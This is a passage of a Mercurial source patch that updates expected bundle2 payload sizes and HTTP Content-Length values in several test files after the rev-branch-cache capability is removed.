bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -856,7 +856,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -865,7 +865,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -946,14 +946,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1033,14 +1033,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1116,14 +1116,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1194,14 +1194,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1283,14 +1283,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1374,14 +1374,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1461,14 +1461,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1543,14 +1543,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1631,14 +1631,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1753,14 +1753,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1840,14 +1840,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1918,14 +1918,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1992,14 +1992,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2060,14 +2060,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2152,14 +2152,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2243,14 +2243,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2316,14 +2316,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2401,14 +2401,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -129,10 +129,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -162,9 +162,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" @@ -241,10 +241,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -275,9 +275,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -73,7 +73,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled @@ -141,7 +140,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled diff --git a/tests/test-clonebundles.t b/tests/test-clonebundles.t --- a/tests/test-clonebundles.t +++ b/tests/test-clonebundles.t @@ -589,9 +589,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 59 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 2 changesets with 2 changes to 2 files diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -636,7 +636,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -654,7 +653,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps diff --git a/tests/test-http-bad-server.t b/tests/test-http-bad-server.t --- a/tests/test-http-bad-server.t +++ b/tests/test-http-bad-server.t @@ -118,17 +118,17 @@ readline(115 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(4? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1? from *) -> (1?) Accept-Encoding* (glob) read limit reached; closing socket @@ -163,17 +163,17 @@ readline(213 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(13? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(8? from *) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -228,17 +228,17 @@ readline(234 from *) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py36 !) - sendall(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py3 no-py36 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py36 !) + sendall(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py3 no-py36 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 463\r\n (no-py3 !) + write(21) -> Content-Length: 444\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(1?? from 65537) -> (27) POST /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(1?? from *) -> (41) content-type: application/mercurial-0.1\r\n (glob) @@ -296,7 +296,7 @@ Traceback (most recent call last): Exception: connection closed after sending N bytes - write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) + write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) write(36) -> HTTP/1.1 500 Internal Server Error\r\n (no-py3 !) $ rm -f error.log @@ -307,7 +307,7 @@ $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone - abort: HTTP request error (incomplete response; expected 450 bytes got 20) + abort: HTTP request error (incomplete response; expected 431 bytes got 20) (this may be an intermittent network failure; if the error persists, consider contacting the network or server operator) [255] @@ -320,17 +320,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(20 from 450) -> (0) batch branchmap bund (py36 !) - write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 